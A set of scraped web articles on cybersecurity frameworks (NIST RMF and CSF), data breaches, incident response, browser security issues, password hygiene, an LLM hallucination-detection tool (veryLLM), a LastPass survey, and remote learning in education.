- Categorize: This step involves categorizing the system and information based on impact analysis.
- Select: This step involves selecting the set of NIST SP 800-53 controls to protect the system based on risk assessment(s).
- Implement: This step involves implementing the security controls.
- Assess: This step involves assessing the effectiveness of the security controls.
- Authorize: This step involves making risk-based decisions to authorize the system.
- Monitor: This step involves continuously monitoring security controls to ensure they are operating as intended and producing the desired results.
What is NIST SP?
NIST’s publications are considered authoritative in the field of cybersecurity and are widely used to help organizations and individuals strengthen their security postures and protect sensitive information. Many of these publications are often used by government agencies, businesses, and individuals to improve security practices and ensure NIST compliance standards. Some of the key NIST publications in the context of cybersecurity include:
NIST Special Publication (NIST SP): these are perhaps the most well-known publications in the field of information security. They cover topics such as risk management, encryption standards, security controls, and guidelines for securing various technologies.
NIST Interagency Reports (IRs): These reports often document research and recommendations for various technical and scientific topics, including cybersecurity.
NIST Federal Information Processing Standards (FIPS): These are specific standards and guidelines that federal agencies are required to follow for securing information and technology systems.
NIST Cybersecurity Framework: This framework provides guidance for organizations to develop and improve their cybersecurity risk management processes.
NIST Computer Security Resource Center (CSRC): The CSRC provides access to a wealth of information, including guidelines, standards, and publications related to computer security.
NIST Cybersecurity Practice Guides: These guides provide practical, step-by-step instructions for implementing various cybersecurity solutions and best practices.
NIST Security Bulletins: These contain alerts, updates, and other information related to current cybersecurity threats and vulnerabilities.
What is RMF vs CSF?
NIST Risk Management Framework (RMF) is primarily aimed at the federal government and its contractors, with a specific focus on managing risks in government information systems in the United States. On the other hand, the NIST Cybersecurity Framework (CSF) is a more general framework that can be used by a wide range of organizations to enhance their overall cybersecurity practices. While there may be some overlap between the two frameworks, they have different scopes and intended audiences. Many organizations may choose to use both frameworks in conjunction to achieve comprehensive cybersecurity and risk management.
NIST Risk Management Framework (RMF)
As stated above, RMF target audience is primarily designed for government agencies and contractors that handle sensitive government information.
- NIST Cybersecurity Framework (CSF) is a more general framework designed to help organizations, both public and private, manage and improve their overall cybersecurity posture. It is a voluntary framework that can be adopted by a wide range of entities.
- The RMF provides a structured process for managing risks throughout the entire system development and operational lifecycle. It emphasizes continuous monitoring and authorization of information systems.
- The RMF also includes the 7 steps for mitigating and monitoring risk.
NIST Cybersecurity Framework (CSF)
NIST Cybersecurity Framework (CSF) is a more general framework designed to help organizations, both public and private, manage and improve their overall cybersecurity posture. It is a voluntary framework that can be adopted by a wide range of entities.
- CSF target audience is intended for organizations of all types and sizes, including critical infrastructure sectors, businesses, and government agencies.
- The CSF is built around five core functions: Identify, Protect, Detect, Respond, and Recover. These functions help organizations address various aspects of cybersecurity, from risk management to incident response.
- The CSF is highly flexible and can be adapted to an organization’s specific needs and circumstances. It provides guidance on how to assess and improve an organization’s cybersecurity posture. | <urn:uuid:76287d42-4744-4f6d-87d7-82a9d84b79ef> | CC-MAIN-2024-38 | https://www.calcomsoftware.com/nist-risk-management-framework-rmf-explained/ | 2024-09-10T01:50:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651164.37/warc/CC-MAIN-20240909233606-20240910023606-00120.warc.gz | en | 0.930844 | 1,098 | 2.765625 | 3 |
What Is the National Institute of Standards and Technology Cybersecurity Framework?
In 2014, the National Institute of Standards and Technology (NIST) developed what is known as the NIST Cybersecurity Framework. This framework helps the private sector and businesses of all types have now adopted it for their own benefit.
Functions of NIST Cybersecurity Framework
Within the NIST Cybersecurity Framework, all actions fall into five main categories:
- Identify: This function is the foundation of the cybersecurity framework. Learn to identify the risks related to operations, assets, and resources and create a risk management strategy.
- Protect: Protection focuses on the procedures you’ll use to prevent attacks and keep critical functions operating. Establishing data protection programs and training staff on security threats are vital in this step.
- Detect: This function involves the actions you take to detect cybersecurity risks. You implement the appropriate measures to ensure that your team or programs can identify events.
- Respond: With this step, you’ll focus on how your team responds to a detected risk. Aspects include following your response plans, event analysis, and developing improvements.
- Recover: These steps are about how to get compromised systems running again. Recovery includes determining how you’ll change your setup to increase security in the future.
Benefits of NIST Risk Management Framework
Implementing the NIST Cybersecurity Framework provides several benefits for your business. It’s a plan with clearly defined steps that you can tailor to meet your needs. Understand and respond to risks in an organized manner with the NIST Framework. The benefits of incorporating this program into your business to avoid costly cybersecurity breaches outweigh the initial price tag.
How to Implement NIST Cybersecurity Framework
Before implementing the NIST Framework, you should examine the assets and protections you already have. Determine areas where you need improvement. We suggest starting with the “Identify” foundational step. You can work through the functions above and repeat steps as needed.
You can follow NIST Cybersecurity Implementation Tiers to make this process simpler. There are a total of four tiers:
Frequently Asked Questions About NIST Cybersecurity Framework
Here are some of the most frequently asked questions about the NIST Cybersecurity Framework:
- Is the NIST Cybersecurity Framework a requirement for my organization? The framework is voluntary.
- Who can use the NIST Cybersecurity Framework? Any business in the private or public sector can implement the NIST Framework.
- Should my company use the NIST Framework if we already have a cybersecurity program? You can still implement the framework even if you already have cybersecurity measures.
Enhance Your Cybersecurity Programs
Our team will gladly assist you in implementing the NIST Cybersecurity Framework. Learn about cybersecurity programs from Agio today.
Connect with us.
Need a solution? Want to partner with us? Please complete the fields below to connect with a member of our team. | <urn:uuid:ec5dcd00-a6cb-4e6f-b3a2-55e73ec1ff26> | CC-MAIN-2024-38 | https://agio.com/what-is-nist-cybersecurity-framework/ | 2024-09-17T10:11:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00420.warc.gz | en | 0.91238 | 604 | 2.921875 | 3 |
Lost Data Doesn't Necessarily Lead to Crimes
The year 2005 will likely go down in history as the year of the data security breach. It was a year in which CardSystems Solutions Inc. revealed a security breach that exposed data on potentially more than 40 million payment-card accounts. DSW Shoe Warehouse disclosed the theft of credit-card data on 1.4 million customers. Information brokers LexisNexis and ChoicePoint revealed breaches involving millions of sensitive records. It was also the year of lost data, with UPS, Citigroup, Bank of America, Ameritrade, and Time Warner all reporting losses of backup tapes containing sensitive data.But beyond all the hoopla, what is the likely economic impact of these and other data breaches? Do some data breaches pose more of a risk than others? What can banks do to prevent and detect identity theft?
Hard numbers are difficult to come by. According to the Federal Trade Commission, some 246,570 identity theft cases were recorded in its Sentinel consumer fraud database in 2004; the FTC defines ID theft broadly as the appropriation of personal information such as a Social Security number or credit card account number to commit fraud or theft.
Others take a finer-grained approach, creating two buckets of identity crime: account fraud (in which a person's account number is stolen and used to commit fraud) and identity theft (in which existing accounts are taken over or new ones created using the victim's Social Security number and other data).
To put some meat on the bare-bones statistics, ID Analytics Inc., an identity-theft risk management company, studied four high-level identity crime cases involving approximately half a million consumer identities. Two of them involved account fraud, and two involved identity theft. The company analyzed transactions for suspicious activity using its proprietary fraud detection technology, Graph Theoretic Anomaly Detection, which sifts data for clues, such as a single Social Security number associated with two or more individuals.
The findings suggest that the fears stirred by identity-type data losses may be overblown. While identity theft poses the greatest threat to consumers, ID Analytics found that the highest rate of misuse of victims' identities was less than one-tenth of one percent of all identities compromised—or less than one in 1,000.
The findings also suggest that the likelihood of criminal misuse is correlated with the type of data breach. Deliberate hacking of a database produced the highest rate of crime, followed by inadvertent access to sensitive data (such as data that is accessed on a stolen laptop). Losses of data, such as tapes falling off a truck, were considered to be the least likely breeches to result in subsequent crimes.
The findings confirm what can be intuitively grasped about criminal intent: The more targeted and focused the attempt to siphon off personal data, the greater the likelihood it will lead to fraud. While the CardSystems breach resulted in millions of accounts being exposed, the likelihood that more than a tiny fraction will be used to commit crime is quite small. "The smaller the breach the higher the likelihood of misuse," says Mike Cook, co-founder of ID Analytics. "A smaller breach is more worrisome."
One of the factors mitigating against the criminal use of data is the sheer length of time it takes to commit fraud. It takes about five minutes to fill out a credit application. At that rate it would take a single thief working 6.5 hours a day, five days a week, 50 weeks a year---over 50 years to create one million phony identities.
That's no cause for rejoicing, however; once a victim's identity has been stolen, the thief can sit on it for a while, then spring it to life after the heat's died down. For this reason, "any company has to perform due diligence on lost data" for a long time after the breach has occurred, says Cook. "Someone can slowly milk identities and after 15 months have an uptick in a use," he says. "It's important for all companies that have a breach to use technology to determine who's been harmed."
Andrew Miller is a freelance writer specializing in financial services and information technology. He holds an MBA from Columbia University and a Master's in computer science from Rensselaer Polytechnic Institute. He has held jobs at CMP Media, MetLife, and Gartner. | <urn:uuid:23c2116c-1395-424b-b3df-c3471292ef5a> | CC-MAIN-2024-38 | https://www.bankinfosecurity.com/lost-data-doesnt-necessarily-lead-to-crimes-a-108 | 2024-09-07T16:50:44Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00420.warc.gz | en | 0.952564 | 890 | 2.578125 | 3 |
InfoSec professionals are building systems and adopting tools to help safeguard against ransomware, malware and phishing attacks. Firms are also building an incident response plan that an incident will occur and the plan will guide them out of danger.
Incident response definition
An incident response plan is prepared by an organization on how to responds to a cyber attack or a data breach. It aims to reduce the potential damage of a breach.
Incident response is an approach used in an organization to address and manage a data breach or cyberattacks. It is also called IT incident, computer incident or security incident. It helps in reducing the recovery time and cost by limiting the damage.
How to create an incident response plan
An incident response plan can help you to overcome the damage on time and improves future security efforts. Here is how an incident response plan should be prepared.
Assign clear responsibilities
An incident response plan should be started with assigning roles, assign who will oversee the development of the plan. Gather inputs and assigns roles accordingly. Select who will work in the security incident response team. The team will be responsible for detection, classification, notification, analysis, containment, eradication, documentation, and post-incident activity.
Define your risk tolerance
After assign tasks, you need to define your risk tolerance. Identify your critical data, key functionality the company requires and then prioritize the efforts. Seek the help of the stakeholders during identifying the risks.
The third step is incident classification and it is done after defining roles and risks. Develop an incident and classify it so that you better know what action to take. Classified risk helps to prioritize the events. Documented incidents also help during audit and investigation.
Set explicit instructions
After classifying the incidents, you can now divide the role to each person and clarifies their duties. The report should include everything from fixed time scales for an investigation to steps needed for remediating the problems. It will help in avoiding bad decisions.
It should include what actions the SIRT must take when an incident is uncovered. The SIRT will be responsible to investigate and analyze the potential scope. Do not delete any data during the investigation.
Prioritize eradication and recovery
The critical data that enables your business should be fully backed up. For the right eradication and recovery, you need to perform triage. It is vital to learn from an incident and avoid such mistakes in the future. | <urn:uuid:63a1977b-aad8-4fc8-9858-bb87d1902e3b> | CC-MAIN-2024-38 | https://www.infoguardsecurity.com/what-is-the-incident-response-05-steps-for-building-a-robust-ir-plan/ | 2024-09-07T16:54:50Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00420.warc.gz | en | 0.944548 | 494 | 2.96875 | 3 |
Web security can be divided into two parts, Website security and Web Browser security. Both are equally important. A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website. If either side of these assumptions fails, then there is a problem (the Web is not secure). Attacks targeting browsers, which will be the focus of this post, can be broadly categorized into three distinct vectors:
1) Attacks designed to escape the confines of the browser walls and execute within the desktop operating system below. This is primarily achieved by exploiting memory and file-handling implementation flaws.
2) Behavioral attacks that trick users into doing something, such as downloading and installing malware, thereby harming their machine or encouraging them to reveal sensitive information.
3) Attacks taking advantage of design flaws in the way the Web works. These attacks normally remain within the browser walls and use the victim’s browser as a launch platform for surreptitiously pilfering information from their session or the surrounding network.
After years of massive volumes of CVEs (repository for published vulnerabilities), the browser vendor incumbents (Microsoft, Mozilla, Opera, Google, Apple) have made great strides in addressing vector #1. Some have more work to do than others. This is a good thing, as exploiting unpatched browsers is the primary method for malware propagation such as the so-called drive-by-downloads, legitimate websites hosting malware that infects their visitors. Fortunately “fixing” #1 doesn’t require “breaking the Web,” only updating shoddy code and distributing updates.
Solving #2 is more psychological than technical in nature. The challenge is that people trust computer screens, believe what they see on the Web, and will install anything in order to watch the latest celebrity sex tape or open a personalized e-greeting sent by their “friend.” Attackers prey on this inherent trust, general good nature, and basic human instinct. In response, browsers have provided EV-SSL, Anti-Phishing Toolbars, SSL warning dialogs, password managers, etc. These efforts make important security decisions more visible, harder to get wrong, or remove the decision altogether. Again “fixing” these issues doesn’t require “breaking the Web,” but creating a more intuitive user-interface design.
Addressing #3, with roots dating back to the earliest days of the Web, is another matter entirely. Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Clickjacking, CSS History Stealing, Intranet Hacking, etc. are all good examples. While these weren’t pressing issue before, they are trending in a dangerous direction. We’ve seen outbreaks of Twitter worms, XSS Defacements of government websites, Facebook Clickjacking attacks, sites that disclose which porn sites people visit, several Intranet Hacking proof-of-concept tools, and so on.
Many, including myself, have asked the major browser vendors to do something about the CSS History Hacking, a privacy violation where a malicious website can tell if you’ve been to a certain URL, by disabling access to key DOM APIs. They said doing so would break certain websites and upset Web developers. (Update: See Wladimir's comment below for excellent insight into the true difficulty of solving this problem)
To solve Intranet Hacking, the suggestion was made to deny websites with a non-RFC 1918 IP address the ability to passively instruct a browser to connect to RFC 1918 IP addresses. The response was that it would break certain essential features like corporate Web proxy set-ups and add-ons like Google Desktop.
Fixing Clickjacking would require changing IFRAMES implementation so that they would not be transparent or allowed at all. Doing so would undoubtedly cause major Web breakage, such as no banner advertising or Facebook-style application platforms. So instead we get opt-in X-FRAME-OPTIONS, which basically no one uses at the moment.
Maybe browser tab/session separation is in order. When logged-in to a website in one tab, other tabs wouldn’t have session access thereby limiting the damage XSS, CSRF, and Clickjacking could inflict. But, this solution would probably annoy users and Web developers who really want persistent authentication. Oh, and we really need Web tracking cookies too. Gah!
So here we are, waiting for the other shoe to drop, and bad enough things to happen. Then we’ll get the juice required to fix these problems, by default. The bigger problem is when that time eventually comes we might actually be forced to break the Web to secure it. In the meantime, the community has been lobbying hard for opt-in tools that the proactive crowd can use to protect themselves ahead of time. Fortunately, we are starting to see new technologies like XSSFilter, Content Security Policy, Strict Transport Security, and Origin headers come into view. Maybe this is the future and a look into the security proving ground for the changes we’ll need to make later. | <urn:uuid:ec12a7f6-0526-428e-8410-adfcc0c1df0e> | CC-MAIN-2024-38 | https://blog.jeremiahgrossman.com/2010/02/web-wont-be-safe-let-alone-secure.html?showComment=1265236514359 | 2024-09-10T05:00:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00220.warc.gz | en | 0.929604 | 1,068 | 3.015625 | 3 |
Password security is a critical aspect of cyber security. A strong password can protect your personal and sensitive information from being accessed by unauthorised users and reduce the risk of your accounts being compromised.
Unfortunately, we make it all too easy for hackers by using simple and easy to guess passwords. “123456” is still the most commonly used password throughout the world and provides no protection whatsoever should a hacker target a device.
This approach to password security is very risky and leaves many people vulnerable to being hacked. Hackers have a range of tools at their disposal, but the easiest and most frequently used method to gain access to an account is to guess passwords.
Sophisticated hackers will even use specialist software that enables them to test thousands of possible username and password combinations per second demonstrating the sheer brute force used to attack. 60% of people use the same username and password credentials for all their accounts so if hackers are able to gain access to one account, they have free reign to break into them all.
As soon as hackers gain access to this personal information, they can use it to commit identity fraud, sell on to criminal third parties or simply clear out bank accounts and never be seen again.
Creating a strong password is crucial in protecting our online identity and ensuring that we don’t become easy targets for hackers. Here are 5 top tips to improve password security.
Top Tips to Improve Password Security
1. Create Unique Passwords
The secret to creating a unique and secure password is to make it memorable but difficult to crack. A strong password should be between 12-20 characters long, contain a mix of upper and lowercase letters, and include numbers or symbols.
To make it even more secure, you can create a pass phrase that is unique to you. The phrase should be around 15 characters long. The first letter of each word will form the basis of your password and letters can be substituted with numbers and symbols to add further protection.
2. Use Different Passwords for Different Accounts
With so many different online accounts, it can be tempting to use the same password for multiple accounts to gain quick and easy access. However, this is extremely risky and if attackers can work out just one of your passwords, whether it’s a Facebook account or your online banking details, they can potentially access every single account you have. It’s always best to use different passwords for different accounts to ensure your data remains safe and secure.
3. Consider the use of a Password Manager
It can be a daunting task trying to remember lots of different, complex passwords, but a password manager will provide a centralised and encrypted location that will keep a record of all these passwords safe.
Password managers, such as Lastpass store login details for all the websites that you use and logs you in automatically each time you return to a site. The first step when using a password manager is to create a master password. The master password will control access to your entire password database. This password is the only one you will have to remember so it’s important to make this as strong and secure as possible.
Password managers can also protect against phishing and social engineering attacks as they fill in account information based on registered web addresses. If you think you’re on your bank’s website but the password manager doesn’t automatically log you in, there’s a good chance that you’ve strayed onto a phishing site.
4. Update passwords
To ensure that your online accounts remain safe and secure, it’s best to update your password on a regular basis. If you continue to use the same password year after year on multiple accounts, it greatly increases the chance of your accounts being hacked.
Entire passwords can be changed, or elements of each password can be changed to make it easier for you to remember but harder to crack. Rather than change your full password, you can change characters, numbers, add symbols, or reverse the use of uppercase or lowercase letters.
If one of your accounts has been compromised, you should immediately create a new password on the affected service and any others that use the same or similar password.
5. Two-Factor Authentication
Two-factor authentication offers an extra layer of defence in protecting the security of your accounts. There are a range of different two-factor authentication sites available that can be used for this process.
Once you have registered, you can log in into your accounts as normal and enter your password. As soon as you do this, the two-factor authentication site will send a one-off code to your phone that you must enter before gaining access to your account. This reduces the chance of a hacker being able to gain easy access to your accounts and improves your password security.
MetaCompliance specialises in creating the best Cyber Security awareness training available on the market. Our products directly address the specific challenges that arise from cyber threats and corporate governance by making it easier for users to engage in Cyber Security and compliance. Get in touch for further information on how we can help transform Cyber Security training within your organisation. | <urn:uuid:9af12e8e-4514-449d-a0da-6611813d0e16> | CC-MAIN-2024-38 | https://www.metacompliance.com/blog/security-awareness-training/top-5-tips-to-improve-password-security | 2024-09-10T03:33:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00220.warc.gz | en | 0.9244 | 1,043 | 2.8125 | 3 |
In the world of artificial intelligence, large language models (LLMs) have become indispensable tools for a wide range of applications. However, with their immense power comes a significant challenge: the potential for hallucinations and inaccuracies in their outputs. Enter veryLLM, a new open-source initiative created by Vianai, dedicated to identifying and rectifying inaccuracies in the generated outputs of LLM models. In this blog post, we will dive deep into the world of veryLLM, exploring its components, inner workings, and the collaborative efforts it encourages to ensure the trustworthiness of language models.
What is veryLLM?
veryLLM, is a framework crafted to address the critical challenge of improving the reliability of large language models. Developed by Vianai, a leading name in AI research and development, veryLLM seamlessly complements Vianai's Hila Enterprise product, contributing to advancements in the AI field.
At the heart of veryLLM are several crucial components designed to support the challenge of solving the issue of hallucinations in LLMs:
1. Hallucination Dataset:
The VeryLLM project offers a distinctive hallucination dataset that originates from the TruthfulQA dataset (https://github.com/sylinrl/TruthfulQA) but has been meticulously modified and expanded to focus on hallucinations rather than truths. This expansion is crucial because hallucinations often stem from interpolated dataset-truths that either are out-of-context for a given question or not widely understood as global-truths. This dataset has undergone rigorous manual evaluation by multiple team members, and we actively encourage our community to participate in critiquing and further expanding it.
2. Truthful Function Framework:
Within veryLLM, we introduce an approach to hallucination detection through "truthful functions" (is_true() functions). These functions play a critical role in assessing the veracity of language model responses by considering the question posed to the LLM, the generated response, and the relevant contextual information used by the LLM in generating that response. Is_true() functions are designed to be modular and work alongside LLMs, providing support for existing and future language models.
This framework simplifies the process of creating these functions, making it accessible to data scientists and developers alike. Additionally, it offers an automated testing and upload pipeline, allowing creators to effortlessly benchmark their functions against others and potentially earn a coveted place on the leaderboard. This collaborative environment promotes the development of the most reliable functions for the benefit of the entire community.
3. GUI Playground:
veryLLM offers a user-friendly GUI playground that serves as a valuable sandbox for researchers and data scientists to experiment with various is_true() functions. What distinguishes this playground is its integration of an ensemble of top-performing functions from the leaderboard, ensuring rigorous verification.
While it's important to note that the frontend UI of veryLLM is not currently open-sourced, it is public and freely accessible for developers. This transparency allows developers to explore and understand the functionalities veryLLM offers, providing insights for potential integration into their own language model applications. Developers may also directly interact with veryLLM APIs from Jupyter notebooks and python scripts to evaluate performance of these is_true() functions.
""At the heart of veryLLM are several crucial components designed to support the challenge of solving the issue of hallucinations in LLMs."
veryLLM's is_true() functions are designed to classify statements into three distinct categories:
1. Verified: Statements in this category are substantiated by specific contextual information from Wikipedia. Users are provided with sources to corroborate the information. Additionally, users can view additional information, like the results of all is_true() functions used to evaluate the statement with the specific context paragraph considered.
2. Not Verified: In some cases, even with the most pertinent context available, a statement cannot be definitively confirmed as true. This category reflects such instances. It's important to note that this category does not ensure that the statement is false; rather, the statement is likely unsubstantiated given the reference context. veryLLM operates as a truth detector, not a lie detector.
3. Unable to Verify: This classification indicates a lack of relevant information within the subset of Wikipedia articles utilized as context. It signifies the need for additional context to assess the veracity of the statement effectively.
Important to highlight is that veryLLM's current context pool comprises a subset of Wikipedia articles. Instead of reprocessing vast amounts of data, veryLLM taps into Cohere's extensive collection of 1 million+ embedded Wikipedia articles at the paragraph level (https://txt.cohere.com/embedding-archives-wikipedia/), made accessible via Weaviate's publicly accessible vector database instance (https://weaviate.io/?ref=txt.cohere.com). Given that most publicly disclosed LLM training datasets include Wikipedia, this approach provides a robust foundation for veryLLM's verification process.
Furthermore, veryLLM intends to expand its contextual resources by processing paragraph-level embeddings of other commonly used datasets in the training of LLMs for datasets like C4 / Common Crawl (https://commoncrawl.org/) and others. This expansion will enable the verification of claims from a wider range of topics. This is a call to our community to actively participate in helping us map and process the training datasets of all widely used LLMs, fostering a collaborative environment that enhances the trustworthiness of AI systems.
Developers working with language models can easily integrate VeryLLM's APIs to verify the accuracy of LLM responses. Whether they want to test their own is_true functions or simply integrate the best LLM output verification, our straightforward API allows them to achieve this with just a few lines of code, providing access to comprehensive verification details for each sentence generated by the LLM.
Getting Started with veryLLM
For those interested to join the effort, check out these resources:
– veryLLM GitHub Repository – https://github.com/vianai-oss/veryLLM
– veryLLM Playground – https://www.veryllm.ai/
These links are your gateway to exploring veryLLM, contributing to its development, and making a positive impact on the reliability of language models.
In the ever-evolving field of AI, the importance of reliable language models cannot be overstated. veryLLM offers a robust framework for identifying and addressing hallucinations in these models. It reflects Vianai's dedication to enhancing the trustworthiness of language models and welcomes the broader AI community to join us in this effort. With veryLLM, we are advancing towards a future where AI-generated content is not just powerful but also unquestionably reliable.
Our Approach, Our Products
Since its inception, Vianai's mission has been to bring human-centered and responsible AI to enterprises worldwide. H+AIâ„¢ is the philosophy that underpins all of the work we do at Vianai, the products we build, and how we work with customers. | <urn:uuid:101af97f-2b1c-44b4-85fd-c10df9df24d6> | CC-MAIN-2024-38 | https://www.vian.ai/content/veryllm-an-open-source-solution-for-enhancing-language-model-reliability | 2024-09-10T03:37:49Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00220.warc.gz | en | 0.912772 | 1,476 | 2.75 | 3 |
BOSTON, November 1, 2022 -- LastPass today released findings from its fifth annual Psychology of Password findings, which revealed even with cybersecurity education on the rise, password hygiene has not improved. Regardless of generational differences across Boomers, Millennials and Gen Z, the research shows a false sense of password security given current behaviors across the board. In addition, LastPass found that while 65% of all respondents have some form of cybersecurity education – through school, work, social media, books or courses via Coursera or edX – the reality is that 62% almost always or mostly use the same or variation of a password.
The goal of the LastPass Psychology of Passwords research is to showcase how password management education and use can secure users' online life, transforming unpredictable behavior into real and secure password competence. The survey, which explored the password security behaviors of 3,750 professionals across seven countries, asked about respondents’ mindset and behaviors surrounding their online security. The findings highlighted a clear disconnect between high confidence when it comes to their password management and their unsafe actions. While the majority of professionals surveyed claimed to be confident in their current password management, this doesn’t translate to safer online behavior and can create a detrimental false sense of safety.
Key findings from the research include:
- Gen Z is confident when it comes to their password management, while also being the biggest offenders of poor password hygiene. As the generation who has lived most of their lives online, Gen Z (1997 – 2012) believes their password methods to be “very safe.” They are the most likely to create stronger passwords for social media and entertainment accounts, compared to other generations.
However, Gen Z is also more likely to recognize that using the same or similar password for multiple logins is a risk, but they use a variation of a single password 69% of the time, alongside Millennials (1981 –1996) who do this 66% of the time. On the other hand, Gen Z is the generation most likely to use memorization to keep track of their passwords by 51%, with Boomers (1946 – 1964) the least likely to memorize their passwords at 38%. - Cybersecurity education doesn’t necessarily translate to action. With 65% of those surveyed claiming to have some type of cybersecurity education, the majority (79%) found their education to be effective, whether formal or informal. But of those who received cybersecurity education, only 31% stopped reusing passwords. And only 25% started using a password manager.
- Confidence creates a false sense of password security. While 89% of respondents acknowledged that using the same password or variation is a risk, only 12% use different passwords for different accounts, and 62% always or mostly use the same password or a variation. To add to that, compared to last year, people are now increasingly using variations of the same password, with 41% in 2022 vs. 36% in 2021.
“Our latest research showcases that even in the face of a pandemic, where we spent more time online amid rising cyberattacks, there continues to be a disconnect for people when it comes to protecting their digital lives,” said Christofer Hoff, Chief Secure Technology Officer for LastPass. “The reality is that even though nearly two-thirds of respondents have some form of cybersecurity education, it is not being put into practice for varying reasons. For both consumers and businesses, a password manager is a simple step to keep your accounts safe and secure.”
For more information and to download the full Psychology of Passwords research findings, please click here.
LastPass commissioned the market research firm Lab42 to reveal the current state of password behaviors in the new era of remote work. The responses were generated from a survey of 3,750 professionals at organizations across a variety of industries in the United States, United Kingdom, Germany, Australia, Singapore, and Brazil. The survey asked the professionals surveyed about their feelings and behaviors regarding online security. The result? An increase in time spent online with continued poor password behavior and cognitive dissonance.
LastPass is an award-winning password manager which has helped more than 33 million registered users organize and protect their online lives. For more than 100,000 businesses of all sizes, LastPass provides password and identity management solutions that are convenient, easy to manage and effortless to use. From enterprise password management and single sign-on to adaptive multi-factor authentication, LastPass for Business gives superior control to IT and frictionless access to users. For more information, visit https://www.lastpass.com. LastPass is trademarked in the U.S. and other countries. | <urn:uuid:3c9ffe9f-6901-4a30-8fe8-e92c53eb528c> | CC-MAIN-2024-38 | https://www.lastpass.com/company/newsroom/press-release/lastpass-research-finds-false-sense-of-cybersecurity-running-rampant | 2024-09-13T17:35:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00820.warc.gz | en | 0.944469 | 946 | 2.703125 | 3 |
The first full school year of remote, in-person, or hybrid model of instruction during the COVID-19 era is finally behind us. Now that the dust is settling on that tumultuous time for students, teachers, parents, and administrators, we need to reflect and dissect the cases of perseverance and success and how they came about so that we can be ready to grapple with the challenges that we will surely meet going forward. Indeed, there are many lessons to be learned from the past year, but possibly the most critical is the need for school systems in every community to have a plan to deliver technology-enabled instruction to students.
Leveraging technology to improve student outcomes is not a new concept but it is a practice typically done in isolation and at the maximum comfort level of the teacher. Many instructors to this day reject the full capabilities of what advanced technologies can provide in favor of a twentieth-century model of manual computing and labor because that is “how it has always been done.” In reality, new and innovative technologies, coupled with the ability to digitize and deliver content remotely, has expanded the capabilities of teachers to personalize instruction based upon a student’s interest, learning style, aptitude, and countless other factors because no two kids are the same. In essence, the traditional paradigm has been flipped from “students go to school to learn” to “learning goes to students wherever they are.”
A May 2020 study examining the impact of school closures on student learning demonstrated that students in schools using technology-enabled instruction, in this case a reading software that helps teachers differentiate instruction for student in grades 2-12–Achieve3000 Literacy, continued to attain similar levels of reading growth during school closures as they had earlier in the year.
Shai Reshef, president of University of the People, an online, non-profit, tuition-free, American-accredited University, says: “Ready or not, COVID-19 has forced higher education online. Universities were ill-prepared to fully switch online and are all understandably frustrated at having to do so in just a few weeks, and even more so now that there is a possibility of remaining online until 2021.”
Reshef says that a big problem many universities are facing right now is that they have been forced to go online before they are ready. But moving to online instruction is tricky and if not implemented properly, instead of succeeding, the online classes may backfire and create major disappointments.
“Quality higher education online is more than just a live zoom class. Developing content and technique that works online takes time, and creating a quick fix for campus closures is going to be difficult,” he said. “At University of the People, we didn’t need to suddenly adapt to an online environment – we’ve been doing this for the past decade and have the infrastructure in place, and the pedagogy and experience in remote learning. For example, our instructors are experienced in teaching online, and are trained on how to address the unique challenges students will face, such as motivation, self-discipline, and the ability to learn alone.”
According to a University of the People/Harris Poll, nearly a third (31%) of Americans have experienced frustration with online schooling systems since the stay-home orders went into effect.
Responses by Nick Schiavi, vice president and global head, high education, Unit 4.
Because most schools have moved to virtual learning environments in response to COVID-19, what are the likely long-term outcomes of this?
The conversations we’ve had lately with our customers, from our people in the field who are leading projects, and those who are in touch with the macro-responses by the global industry, are pointing to a couple of things:
There will likely be more effort spent on planning for continuity of operations. Ensuring that education can still be delivered and institutions can continue to operate without being fully dependent on being in an office is likely to be a focal point.
There is likely to be a focus on faculty enablement and the operational support around them to help them be more comfortable delivering courses anywhere and anytime.
I doubt in-classroom education will go away for good. Will there begin to be a sea-change? Potentially yes, considering all the ways we learn today, during any phase of life, there is a combination of in-person instruction and training; experiential and immersive learning; and self-paced knowledge consumption.
From what I’ve been reading and hearing from educators and other vendors, this situation could create a time to re-focus on curriculum design and delivery methods to increase student engagement. Having family members who are educators, I know the rigors of transitioning instructional design and faculty enablement to effectively deliver online courses can be substantial but enduring them is important to be successful in that transition.
What might institutions need to do to attract and retain students in a climate where supply may begin to outpace demand?
This is an interesting question since enrollment and retention have been common challenges for a long time, even prior to this pandemic. Ultimately I believe that institutions will double-down on their interest in differentiating themselves from their peers. Competition for fewer enrollments may occur in the near term; however, this also offers opportunity for institutions to create more demand for education from a wider age-range of students.
Many institutions already look at “traditional vs. non-traditional enrollments” but this situation may be a catalyst for every institution to focus more on how they can engage new segments of the population as students. I suspect it will provide an opportunity for institutions to become more creative as marketers – potentially even thinking of themselves as product managers seeking to understand their target segments more deeply and re-packaging their offerings to attract new enrollments that are the best fit, which should also help with retaining those students.
How do you continue to support the health, safety, and well-being of students, faculty, and staff with everyone distributed remotely?
I look at this from the angle of prioritization of the urgent-important items first. Imagine if all of our customers lived, worked, and ate in our offices – day in and day out – and they also happened to be young adults not yet accustomed to being on their own. In that scenario during a pandemic crisis I’d first look at how we transition all of our customers back to a safe and protected place, how we monitor and account for their successful transition, how we handle the same monitoring and accounting for our own staff, and only then start looking at basic operations and service delivery needs which in many cases include providing equipment and communications tools to staff that they don’t currently have.
